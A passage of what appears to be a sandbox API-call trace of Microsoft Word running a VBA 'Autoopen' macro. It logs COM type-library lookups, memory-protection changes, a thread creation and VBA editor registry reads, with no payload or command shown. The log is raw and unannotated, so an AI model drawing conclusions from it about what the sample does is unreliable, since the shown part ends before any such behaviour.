This=0x6a861c0, riid=0x7fee45e0b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x185a88 | out: ppvObject=0x185a88*=0x0) returned 0x80004002 [0041.387] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a861c0, ppTypeAttr=0x185a80, pDummy=0x10 | out: ppTypeAttr=0x185a80, pDummy=0x10) returned 0x0 [0041.387] IUnknown:QueryInterface (in: This=0x6a861c0, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1859f8 | out: ppvObject=0x1859f8*=0x0) returned 0x80004002 [0041.387] IUnknown:AddRef (This=0x6a861c0) returned 0x6 [0041.387] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a861c0, ppTypeAttr=0x1859f0, pDummy=0x10 | out: ppTypeAttr=0x1859f0, pDummy=0x10) returned 0x0 [0041.387] ITypeInfo:LocalReleaseTypeAttr (This=0x6a861c0) returned 0x0 [0041.387] IUnknown:Release (This=0x6a861c0) returned 0x5 [0041.387] strcpy_s (in: _Dst=0x6ca6e80, _DstSize=0x9, _Src="Document" | out: _Dst="Document") returned 0x0 [0041.387] IMalloc:Alloc (This=0x7feffc15380, cb=0xc8) returned 0x6c2bd10 [0041.387] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a861c0, ppTypeAttr=0x1859b0, pDummy=0x6a861c0 | out: ppTypeAttr=0x1859b0, pDummy=0x6a861c0*=0xffe207b0) returned 0x0 [0041.387] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x6a861c0, ppTLib=0x1859b8, pIndex=0x1859f8 | out: ppTLib=0x1859b8*=0x6992850, pIndex=0x1859f8*=0x20e) returned 0x0 [0041.387] ITypeLib:RemoteGetLibAttr (in: This=0x6992850, ppTLibAttr=0x1856a8, pDummy=0x0 | out: ppTLibAttr=0x1856a8, pDummy=0x0) returned 0x0 [0041.387] ITypeLib:RemoteGetDocumentation (in: This=0x6992850, index=-1, refPtrFlags=0x1856c0, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x1856e0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x1856e0*=0x0) returned 0x0 [0041.387] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", cchWideChar=58, lpMultiByteStr=0x185730, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB", lpUsedDefaultChar=0x0) returned 58 [0041.387] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Word", cchWideChar=5, lpMultiByteStr=0x185840, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Word", lpUsedDefaultChar=0x0) returned 5 [0041.387] ITypeLib:LocalReleaseTLibAttr (This=0x6992850) returned 0x0 [0041.387] IMalloc:Realloc (This=0x7feffc15380, pv=0x0, cb=0x412) returned 0x3e64df0 [0041.387] IMalloc:Alloc (This=0x7feffc15380, cb=0x230) returned 0x6ca6fc0 [0041.387] IUnknown:AddRef (This=0x6a861c0) returned 0x6 [0041.387] IUnknown:Release (This=0x6992850) returned 0x11 [0041.387] ITypeInfo:LocalReleaseTypeAttr (This=0x6a861c0) returned 0x0 [0041.388] ITypeInfo:LocalReleaseTypeAttr (This=0x6a861c0) returned 0x0 [0041.388] _mbscpy_s (in: _Dst=0x1855e0, _DstSizeInBytes=0x9, _Src=0x38a2b62 | out: _Dst=0x1855e0) returned 0x0 [0041.388] IMalloc:Alloc (This=0x7feffc15380, cb=0x48) returned 0x6b852c0 [0041.388] strcpy_s (in: _Dst=0x6ca6e98, _DstSize=0x9, _Src="Autoopen" | out: _Dst="Autoopen") returned 0x0 [0041.388] IMalloc:Alloc (This=0x7feffc15380, cb=0x26d) returned 0x6ca3f60 [0041.388] IMalloc:GetSize (This=0x7feffc15380, pv=0x6ca3f60) returned 0x26d [0041.388] GetCurrentProcess () returned 0xffffffffffffffff [0041.388] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6ca3f60, dwSize=0x45) returned 1 [0041.388] IMalloc:Free (This=0x7feffc15380, pv=0x6ca3f60) [0041.388] IMalloc:Alloc (This=0x7feffc15380, cb=0x14) returned 0x6c32890 [0041.388] IMalloc:Realloc (This=0x7feffc15380, pv=0x0, cb=0x412) returned 0x3e65240 [0041.388] IMalloc:Free (This=0x7feffc15380, pv=0x6c32890) [0041.388] IMalloc:Alloc (This=0x7feffc15380, cb=0x80) returned 0x6b9fc10 [0041.388] IMalloc:GetSize (This=0x7feffc15380, pv=0x6b9fc10) returned 0x80 [0041.388] IMalloc:Alloc (This=0x7feffc15380, cb=0x18) returned 0x6c32890 [0041.388] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Autoopen") returned 0x102ad9 [0041.388] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Autoopen", cchCount1=-1, lpString2="Autoopen", cchCount2=-1) returned 2 [0041.388] IMalloc:Alloc (This=0x7feffc15380, cb=0x58) returned 0x6a67800 [0041.388] IMalloc:GetSize (This=0x7feffc15380, pv=0x6a67800) returned 0x58 [0041.388] IMalloc:Free (This=0x7feffc15380, pv=0x68e93a0) [0041.389] IMalloc:Alloc (This=0x7feffc15380, cb=0x18) returned 0x6c328b0 [0041.389] IMalloc:Free (This=0x7feffc15380, pv=0x6c328b0) [0041.389] IMalloc:Alloc (This=0x7feffc15380, cb=0x10) returned 0x6c328b0 [0041.389] IMalloc:Free (This=0x7feffc15380, pv=0x6c328b0) [0041.389] IMalloc:Alloc (This=0x7feffc15380, cb=0x58) returned 0x6a67860 [0041.389] GetCurrentProcess () returned 0xffffffffffffffff [0041.389] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6ca67a9, dwSize=0x8) returned 1 [0041.389] GetCurrentProcess () returned 0xffffffffffffffff [0041.389] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6ca67a8, dwSize=0x8) returned 1 [0041.389] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6ca67a9, dwSize=0x8) returned 1 [0041.389] GetCurrentProcess () returned 0xffffffffffffffff [0041.389] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6ca67a8, dwSize=0x8) returned 1 [0041.389] GetCurrentProcess () returned 0xffffffffffffffff [0041.389] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6ca67b8, dwSize=0x2) returned 1 [0041.389] GetCurrentProcess () returned 0xffffffffffffffff [0041.389] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6ca680c, dwSize=0x45) returned 1 [0041.389] VirtualProtect (in: lpAddress=0x6ca680c, dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x18676c | out: lpflOldProtect=0x18676c*=0x4) returned 1 [0041.390] IUnknown:Release (This=0x6a86060) returned 0x1 [0041.390] IUnknown:QueryInterface (in: This=0x6a86110, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x187328 | out: ppvObject=0x187328*=0x0) returned 0x80004002 [0041.390] IUnknown:QueryInterface (in: This=0x6a86110, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x187320 | out: ppvObject=0x187320*=0x0) returned 0x80004002 [0041.390] IUnknown:Release (This=0x6a86110) returned 0x2 [0041.390] IUnknown:AddRef (This=0x6a861c0) returned 0x7 [0041.390] IUnknown:QueryInterface (in: This=0x6a861c0, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x187328 | out: ppvObject=0x187328*=0x0) returned 0x80004002 [0041.390] IUnknown:QueryInterface (in: This=0x6a861c0, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x187320 | out: ppvObject=0x187320*=0x0) returned 0x80004002 [0041.390] IUnknown:Release (This=0x6a861c0) returned 0x6 [0041.390] IUnknown:AddRef (This=0x6a86060) returned 0x2 [0041.390] IUnknown:QueryInterface (in: This=0x6a86060, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x187328 | out: ppvObject=0x187328*=0x0) returned 0x80004002 [0041.390] IUnknown:QueryInterface (in: This=0x6a86060, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x187320 | out: ppvObject=0x187320*=0x0) returned 0x80004002 [0041.390] IUnknown:Release (This=0x6a86060) returned 0x1 [0041.390] IMalloc:Alloc (This=0x7feffc15380, cb=0x8) returned 0x6c14190 [0041.390] IMalloc:GetSize (This=0x7feffc15380, pv=0x6c14190) returned 0x8 [0041.390] IMalloc:Alloc (This=0x7feffc15380, cb=0x78) returned 0x6c10880 [0041.390] IMalloc:GetSize (This=0x7feffc15380, pv=0x6c10880) returned 0x78 [0041.390] IUnknown:AddRef (This=0x6a861c0) returned 0x7 [0041.390] IUnknown:QueryInterface (in: This=0x6a861c0, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x187408 | out: ppvObject=0x187408*=0x0) returned 0x80004002 [0041.390] IUnknown:QueryInterface (in: This=0x6a861c0, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x187400 | out: ppvObject=0x187400*=0x0) returned 0x80004002 [0041.390] IUnknown:Release (This=0x6a861c0) returned 0x6 [0041.390] IMalloc:Alloc (This=0x7feffc15380, cb=0x8) returned 0x6c141a0 [0041.391] IMalloc:GetSize (This=0x7feffc15380, pv=0x6c141a0) returned 0x8 [0041.391] IMalloc:Alloc (This=0x7feffc15380, cb=0x78) returned 0x6c10900 [0041.391] IMalloc:GetSize (This=0x7feffc15380, pv=0x6c10900) returned 0x78 [0041.391] IMalloc:Alloc (This=0x7feffc15380, cb=0x8) returned 0x6c141b0 [0041.391] IMalloc:GetSize (This=0x7feffc15380, pv=0x6c141b0) returned 0x8 [0041.391] IMalloc:Alloc (This=0x7feffc15380, cb=0x78) returned 0x6c10980 [0041.391] IMalloc:GetSize (This=0x7feffc15380, pv=0x6c10980) returned 0x78 [0041.391] IMalloc:Free (This=0x7feffc15380, pv=0x6a67800) [0041.392] IMalloc:Alloc (This=0x7feffc15380, cb=0x40) returned 0x6b85310 [0041.393] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\7.1\\Common", ulOptions=0x0, samDesired=0x1, phkResult=0x1869d0 | out: phkResult=0x1869d0*=0xa04) returned 0x0 [0041.393] RegQueryValueExA (in: hKey=0xa04, lpValueName="VbaCapability", lpReserved=0x0, lpType=0x0, lpData=0x1869c8, lpcbData=0x1869c0*=0x4 | out: lpType=0x0, lpData=0x1869c8*=0x18, lpcbData=0x1869c0*=0x4) returned 0x2 [0041.393] RegCloseKey (hKey=0xa04) returned 0x0 [0041.393] DispCallFunc (pvInstance=0x6c10980, oVft=0xe00, cc=0x4, vtReturn=0xa, cActuals=0x0, prgvt=0x0, prgpvarg=0x0, pvargResult=0x186bf0) returned 0x0 [0041.394] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x1000, lpStartAddress=0x7fee4231778, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x1866b0 | out: lpThreadId=0x1866b0*=0x990) returned 0xa04 [0041.394] PeekMessageA (in: lpMsg=0x186650, hWnd=0x101e8, wMsgFilterMin=0x1045, wMsgFilterMax=0x1045, wRemoveMsg=0x3 | out: lpMsg=0x186650) returned 0 [0041.396] GetActiveWindow () returned 0x101bc [0041.396] IMalloc:Alloc (This=0x7feffc15380, cb=0x9c) returned 0x6c29f30 [0041.396] IMalloc:Alloc (This=0x7feffc15380, cb=0x10) returned 0x6c32970 [0041.396] CLSIDFromString (in: lpsz="{3201CC22-4323-4EF3-8B9C-19E82082DC0D}", pclsid=0x6c32970 | out: pclsid=0x6c32970*(Data1=0x3201cc22, Data2=0x4323, Data3=0x4ef3, Data4=([0]=0x8b, [1]=0x9c, [2]=0x19, [3]=0xe8, [4]=0x20, [5]=0x82, [6]=0xdc, [7]=0xd))) returned 0x0 [0041.396] IMalloc:Alloc (This=0x7feffc15380, cb=0x10) returned 0x6c32870 [0041.397] CLSIDFromString (in: lpsz="{CD48F839-E45B-49E9-A956-2DBED7A8E4A1}", pclsid=0x6c32870 | out: pclsid=0x6c32870*(Data1=0xcd48f839, Data2=0xe45b, Data3=0x49e9, Data4=([0]=0xa9, [1]=0x56, [2]=0x2d, [3]=0xbe, [4]=0xd7, [5]=0xa8, [6]=0xe4, [7]=0xa1))) returned 0x0 [0041.397] IMalloc:Free (This=0x7feffc15380, pv=0x6c299b0) [0041.397] IMalloc:Free (This=0x7feffc15380, pv=0x6c29f30) [0041.397] GetCurrentThreadId () returned 0x8c0 [0041.397] LoadLibraryA (lpLibFileName="COMCTL32.DLL") returned 0x7fefc690000 [0041.398] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10016e9a000001b0) returned 1 [0041.398] GetLastError () returned 0x0 [0041.398] GetProcAddress (hModule=0x7fefc690000, lpProcName="ImageList_Destroy") returned 0x7fefc6f07a4 [0041.398] GetProcAddress (hModule=0x7fefc690000, lpProcName="ImageList_GetIconSize") returned 0x7fefc6f1010 [0041.399] GetProcAddress (hModule=0x7fefc690000, lpProcName="InitCommonControls") returned 0x7fefc7c8b5c [0041.399] GetProcAddress (hModule=0x7fefc690000, lpProcName="ImageList_LoadImageA") returned 0x7fefc6f01a8 [0041.399] GetProcAddress (hModule=0x7fefc690000, lpProcName="ImageList_Create") returned 0x7fefc6f00fc [0041.399] GetProcAddress (hModule=0x7fefc690000, lpProcName="ImageList_SetOverlayImage") returned 0x7fefc6f0a70 [0041.400] GetProcAddress (hModule=0x7fefc690000, lpProcName="ImageList_AddMasked") returned 0x7fefc6f0b60 [0041.400] GetProcAddress (hModule=0x7fefc690000, lpProcName="ImageList_GetImageInfo") returned 0x7fefc6f1180 [0041.400] GetProcAddress (hModule=0x7fefc690000, lpProcName="ImageList_Draw") returned 0x7fefc6f0cd8 [0041.401] GetProcAddress (hModule=0x7fefc690000, lpProcName="ImageList_DrawEx") returned 0x7fefc6f0bdc [0041.401] GetProcAddress (hModule=0x7fefc690000, lpProcName="PropertySheetA") returned 0x7fefc6d5c64 [0041.401] GetProcAddress (hModule=0x7fefc690000, lpProcName="DestroyPropertySheetPage") returned 0x7fefc6cf018 [0041.402] GetProcAddress (hModule=0x7fefc690000, lpProcName="CreatePropertySheetPageA") returned 0x7fefc6cfce8 [0041.402] InitCommonControls () [0041.402] LoadStringA (in: hInstance=0x7fef92d0000, uID=0x80e, lpBuffer=0x186030, cchBufferMax=40 | out: lpBuffer="MdiMaximized") returned 0xc [0041.403] lstrcpyA (in: lpString1=0x185e30, lpString2="Software\\Microsoft\\VBA" | out: lpString1="Software\\Microsoft\\VBA") returned="Software\\Microsoft\\VBA" [0041.403] lstrcatA (in: lpString1="Software\\Microsoft\\VBA", lpString2="\\" | out: lpString1="Software\\Microsoft\\VBA\\") returned="Software\\Microsoft\\VBA\\" [0041.403] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="7.1\\Common", cchWideChar=-1, lpMultiByteStr=0x185e00, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7.1\\Common", lpUsedDefaultChar=0x0) returned 11 [0041.403] lstrcatA (in: lpString1="Software\\Microsoft\\VBA\\", lpString2="7.1\\Common" | out: lpString1="Software\\Microsoft\\VBA\\7.1\\Common") returned="Software\\Microsoft\\VBA\\7.1\\Common" [0041.403] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\7.1\\Common", phkResult=0x185fc8 | out: phkResult=0x185fc8*=0xa14) returned 0x0 [0041.403] RegQueryValueExA (in: hKey=0xa14, lpValueName="MdiMaximized", lpReserved=0x0, lpType=0x0, lpData=0x185fd0, lpcbData=0x185fc0*=0x28 | out: lpType=0x0, lpData=0x185fd0*=0x30, lpcbData=0x185fc0*=0x28) returned 0x2 [0041.403] RegCloseKey (hKey=0xa14) returned 0x0 [0041.403] RegisterClassExA (param_1=0x185fe0) returned 0x162a023fc199 [0041.404] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10016e9a000001b1) returned 1 [0041.404] LoadIconA (hInstance=0x7fef92d0000, lpIconName=0x4b0) returned 0xb01b3 [0041.404] LoadImageA (hInst=0x7fef92d0000, name=0x4b0, type=0x1, cx=16, cy=16, fuLoad=0x0) returned 0xe008d [0041.404] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0041.404] RegisterClassExA (param_1=0x185fe0) returned 0x1635023cc19b [0041.404] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10016e9a000001b2) returned 1 [0041.404] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x186030, fWinIni=0x0 | out: pvParam=0x186030) returned 1 [0041.405] LoadStringA (in: hInstance=0x7fef92d0000, uID=0x3350, lpBuffer=0x183f40, cchBufferMax=512 | out: lpBuffer="Microsoft Visual Basic for Applications") returned 0x27 [0041.405] CreateWindowExA (dwExStyle=0x0, lpClassName=0xc19b, lpWindowName="Microsoft Visual Basic for Applications", dwStyle=0x6cf0000, X=0, Y=0, nWidth=1440, nHeight=860, hWndParent=0x0, hMenu=0x0, hInstance=0x7fee4230000, lpParam=0x0) returned 0x10202 [0041.406] DefFrameProcA (hWnd=0x10202, hWndMDIClient=0x0, uMsg=0x24, wParam=0x0, lParam=0x185970) returned 0x0 [0041.407] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10016e9a000001b3) returned 1 [0041.407] GetClientRect (in: hWnd=0x10202, lpRect=0x186030 | out: lpRect=0x186030) returned 1 [0041.407] CreateWindowExA (dwExStyle=0x200, lpClassName="mdiclient", lpWindowName=0x0, dwStyle=0x56000001, X=0, Y=0, nWidth=1424, nHeight=822, hWndParent=0x10202, hMenu=0xcac, hInstance=0x7fee4230000, lpParam=0x185fd0) returned 0x10204 [0041.408] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10016e9a000001b4) returned 1 [0041.408] CreateMDIWindowA (lpClassName=0xc199, lpWindowName=0x0, dwStyle=0x46cf0000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x10204, hInstance=0x7fee4230000, lParam=0x0) returned 0x10206 [0041.409] SendMessageA (hWnd=0x10204, Msg=0x222, wParam=0x10206, lParam=0x0) returned 0x0 [0041.409] SendMessageA (hWnd=0x10204, Msg=0x224, wParam=0x10206, lParam=0x0) returned 0x0 [0041.409] SendMessageA (hWnd=0x10204, Msg=0x229, wParam=0x0, lParam=0x0) returned 0x10206 [0041.448] lstrcpyW (in: lpString1=0x185c80, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033\\VBEUIINTL.DLL" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033\\VBEUIINTL.DLL") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033\\VBEUIINTL.DLL" [0041.478] lstrcpyA (in: lpString1=0x185e20, lpString2="Software\\Microsoft\\VBA" | out: lpString1="Software\\Microsoft\\VBA") returned="Software\\Microsoft\\VBA" [0041.478] lstrcatA (in: lpString1="Software\\Microsoft\\VBA", lpString2="\\" | out: lpString1="Software\\Microsoft\\VBA\\") returned="Software\\Microsoft\\VBA\\" [0041.478] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="7.1\\Common", cchWideChar=-1, lpMultiByteStr=0x185df0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7.1\\Common", lpUsedDefaultChar=0x0) returned 11 [0041.478] lstrcatA (in: lpString1="Software\\Microsoft\\VBA\\", lpString2="7.1\\Common" | out: lpString1="Software\\Microsoft\\VBA\\7.1\\Common") returned="Software\\Microsoft\\VBA\\7.1\\Common" [0041.478] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\7.1\\Common", phkResult=0x185fb8 | out: phkResult=0x185fb8*=0xa24) returned 0x0 [0041.478] RegQueryValueExA (in: hKey=0xa24, lpValueName="GridWidth", lpReserved=0x0, lpType=0x0, lpData=0x185fc0, lpcbData=0x185fb0*=0x28 | out: lpType=0x0, lpData=0x185fc0*=0x70, lpcbData=0x185fb0*=0x28) returned 0x2 [0041.478] RegCloseKey (hKey=0xa24) returned 0x0 [0041.478] lstrcpyA (in: lpString1=0x185e20, lpString2="Software\\Microsoft\\VBA" | out: lpString1="Software\\Microsoft\\VBA") returned="Software\\Microsoft\\VBA" [0041.478] lstrcatA (in: lpString1="Software\\Microsoft\\VBA", lpString2="\\" | out: lpString1="Software\\Microsoft\\VBA\\") returned="Software\\Microsoft\\VBA\\" [0041.478] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="7.1\\Common", cchWideChar=-1, lpMultiByteStr=0x185df0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7.1\\Common", lpUsedDefaultChar=0x0) returned 11 [0041.478] lstrcatA (in: lpString1="Software\\Microsoft\\VBA\\", lpString2="7.1\\Common" | out: lpString1="Software\\Microsoft\\VBA\\7.1\\Common") returned="Software\\Microsoft\\VBA\\7.1\\Common" [0041.478] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\7.1\\Common", phkResult=0x185fb8 | out: phkResult=0x185fb8*=0xa24) returned 0x0 [0041.478] RegQueryValueExA (in: hKey=0xa24, lpValueName="GridHeight", lpReserved=0x0, lpType=0x0, lpData=0x185fc0, lpcbData=0x185fb0*=0x28 | out: lpType=0x0, lpData=0x185fc0*=0x70, lpcbData=0x185fb0*=0x28) returned 0x2 [0041.478] RegCloseKey (hKey=0xa24) returned 0x0 [0041.478] lstrcpyA (in: lpString1=0x185e20, lpString2="Software\\Microsoft\\VBA" | out: lpString1="Software\\Microsoft\\VBA") returned="Software\\Microsoft\\VBA" [0041.478] lstrcatA (in: lpString1="Software\\Microsoft\\VBA", lpString2="\\" | out: lpString1="Software\\Microsoft\\VBA\\") returned="Software\\Microsoft\\VBA\\" [0041.478] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="7.1\\Common", cchWideChar=-1, lpMultiByteStr=0x185df0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7.1\\Common", lpUsedDefaultChar=0x0) returned 11 [0041.478] lstrcatA (in: lpString1="Software\\Microsoft\\VBA\\", lpString2="7.1\\Common" | out: lpString1="Software\\Microsoft\\VBA\\7.1\\Common") returned="Software\\Microsoft\\VBA\\7.1\\Common" [0041.478] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\7.1\\Common", phkResult=0x185fb8 | out: phkResult=0x185fb8*=0xa24) returned 0x0 [0041.479] RegQueryValueExA (in: hKey=0xa24, lpValueName="ShowGrid", lpReserved=0x0, lpType=0x0, lpData=0x185fc0, lpcbData=0x185fb0*=0x28 | out: lpType=0x0, lpData=0x185fc0*=0x70, lpcbData=0x185fb0*=0x28) returned 0x2 [0041.479] RegCloseKey (hKey=0xa24) returned 0x0 [0041.479] lstrcpyA (in: lpString1=0x185e20, lpString2="Software\\Microsoft\\VBA" | out: lpString1="Software\\Microsoft\\VBA") returned="Software\\Microsoft\\VBA" [0041.479] lstrcatA (in: lpString1="Software\\Microsoft\\VBA", lpString2="\\" | out: lpString1="Software\\Microsoft\\VBA\\") returned="Software\\Microsoft\\VBA\\" [0041.479] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="7.1\\Common", cchWideChar=-1, lpMultiByteStr=0x185df0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7.1\\Common", lpUsedDefaultChar=0x0) returned 11 [0041.479] lstrcatA (in: lpString1="Software\\Microsoft\\VBA\\", lpString2="7.1\\Common" | out: lpString1="Software\\Microsoft\\VBA\\7.1\\Common") returned="Software\\Microsoft\\VBA\\7.1\\Common" [0041.479] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\7.1\\Common", phkResult=0x185fb8 | out: phkResult=0x185fb8*=0xa24) returned 0x0 [0041.479] RegQueryValueExA (in: hKey=0xa24, lpValueName="AlignToGrid", lpReserved=0x0, lpType=0x0, lpData=0x185fc0, lpcbData=0x185fb0*=0x28 | out: lpType=0x0, lpData=0x185fc0*=0x70, lpcbData=0x185fb0*=0x28) returned 0x2 [0041.479] RegCloseKey (hKey=0xa24) returned 0x0 [0041.479] LoadStringA (in: hInstance=0x7fef92d0000, uID=0x819, lpBuffer=0x186000, cchBufferMax=40 | out: lpBuffer="SaveBeforeRun") returned 0xd [0041.479] lstrcpyA (in: lpString1=0x185e00, lpString2="Software\\Microsoft\\VBA" | out: lpString1="Software\\Microsoft\\VBA") returned="Software\\Microsoft\\VBA" [0041.479] lstrcatA (in: lpString1="Software\\Microsoft\\VBA", lpString2="\\" | out: lpString1="Software\\Microsoft\\VBA\\") returned="Software\\Microsoft\\VBA\\" [0041.479] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="7.1\\Common", cchWideChar=-1, lpMultiByteStr=0x185dd0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7.1\\Common", lpUsedDefaultChar=0x0) returned 11 [0041.479] lstrcatA (in: lpString1="Software\\Microsoft\\VBA\\", lpString2="7.1\\Common" | out: lpString1="Software\\Microsoft\\VBA\\7.1\\Common") returned="Software\\Microsoft\\VBA\\7.1\\Common" [0041.479] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\7.1\\Common", phkResult=0x185f98 | out: phkResult=0x185f98*=0xa24) returned 0x0 [0041.479] RegQueryValueExA (in: hKey=0xa24, lpValueName="SaveBeforeRun", lpReserved=0x0, lpType=0x0, lpData=0x185fa0, lpcbData=0x185f90*=0x28 | out: lpType=0x0, lpData=0x185fa0*=0x0, lpcbData=0x185f90*=0x28) returned 0x2 [0041.480] RegCloseKey (hKey=0xa24) returned 0x0 [0041.480] LoadStringA (in: hInstance=0x7fef92d0000, uID=0x814, lpBuffer=0x186000, cchBufferMax=40 | out: lpBuffer="ShowToolTips") returned 0xc [0041.480] lstrcpyA (in: lpString1=0x185e00, lpString2="Software\\Microsoft\\VBA" | out: lpString1="Software\\Microsoft\\VBA") returned="Software\\Microsoft\\VBA" [0041.480] lstrcatA (in: lpString1="Software\\Microsoft\\VBA", lpString2="\\" | out: lpString1="Software\\Microsoft\\VBA\\") returned="Software\\Microsoft\\VBA\\" [0041.480] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="7.1\\Common", cchWideChar=-1, lpMultiByteStr=0x185dd0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7.1\\Common", lpUsedDefaultChar=0x0) returned 11 [0041.480] lstrcatA (in: lpString1="Software\\Microsoft\\VBA\\", lpString2="7.1\\Common" | out: lpString1="Software\\Microsoft\\VBA\\7.1\\Common") returned="Software\\Microsoft\\VBA\\7.1\\Common" [0041.480] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\7.1\\Common", phkResult=0x185f98 | out: phkResult=0x185f98*=0xa24) returned 0x0 [0041.480] RegQueryValueExA (in: hKey=0xa24, lpValueName="ShowToolTips", lpReserved=0x0, lpType=0x0, 